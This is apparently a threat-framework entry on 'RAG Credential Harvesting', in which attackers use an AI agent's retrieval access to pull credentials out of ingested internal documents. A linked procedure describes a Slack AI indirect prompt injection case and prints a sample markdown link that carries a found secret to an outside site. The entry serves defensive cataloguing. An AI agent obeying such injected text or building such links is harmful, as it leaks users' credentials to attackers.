RAG Credential Harvesting

Type: technique

Description: Adversaries may attempt to use their access to a large language model (LLM) on the victim's system to collect credentials. Credentials may be stored in internal documents which can inadvertently be ingested into a RAG database, where they can ultimately be retrieved by an AI agent.

Version: 0.1.0

Created At: 2025-10-01 13:13:22 -0400

Last Modified At: 2025-10-01 13:13:22 -0400

External References

--> Unsecured Credentials (technique): Sub-technique of
--> RAG Data Harvesting (technique): The two techniques are similar apart from their target data and purpose.
<-- RAG Data Harvesting (technique): The two techniques are similar apart from their target data and purpose.
<-- Data Exfiltration from Slack AI via indirect prompt injection (procedure): Once a user asks a question about "EldritchNexus API key", SlackAI has access to information in their private channels. The adversary gets SlackAI to embed any found secret in a clickable link parameter [click here to reauthenticate](https://aiexecutiveorder.com?secret=confetti).

MITRE ATLAS - AML.T0082

AI Agents Attack Matrix

RAG Credential Harvesting

External References

Related Objects

Related Frameworks